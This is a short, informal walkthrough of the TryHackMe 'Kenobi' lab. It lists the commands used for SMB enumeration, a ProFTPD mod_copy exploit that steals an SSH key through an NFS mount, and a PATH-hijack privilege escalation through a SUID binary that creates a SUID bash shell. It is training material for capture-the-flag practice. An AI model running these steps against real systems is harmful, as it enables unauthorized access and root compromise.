Anonymouos

https://tryhackme.com/room/kenobi

Open Ports:

Gaining Access:

1. Enumerating SMB using nmap script

   nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse ip
   

   1. Found Anonymous login in smb
   2. smbclinet ///Anonymous
2. Via ProFTPD 1.3.5
   1. Found exploitdb copy
   2. https://www.exploit-db.com/exploits/36742 (copying id_rsa to var/tmp)
3. Mounting the /var/tmp to out pc
   1. Make mount dir
   2. Mkdir /mnt/kenobi
   3. Mount ip:/var/tmp /mnt/kenobi
4. now copy the shh key from var/tmp to ur desktop
   1. Change permission
   2. Chmod 600 key
5. Connect via ssh

    Ssh -i key kenobi@ip
   

User Flag:

Priviledge Escalation:

1. Looking into SUID bit Ø Find / -perm -u=s 2> /dev/null
   ○ Found menu
   ○ Strings menu
   § Found the no path was specified for curl command
   
2. Now
   Ø Echo ‘cp /bin/bash /tmp/bash;chmod +s /tmp/bash’ > curl
   Ø Chmod 777 curl
   Ø Export PATH=/tmp:$PATH
   Ø /usr/bin/menu and press 1
   Ø Bash -p
   

Root Flag: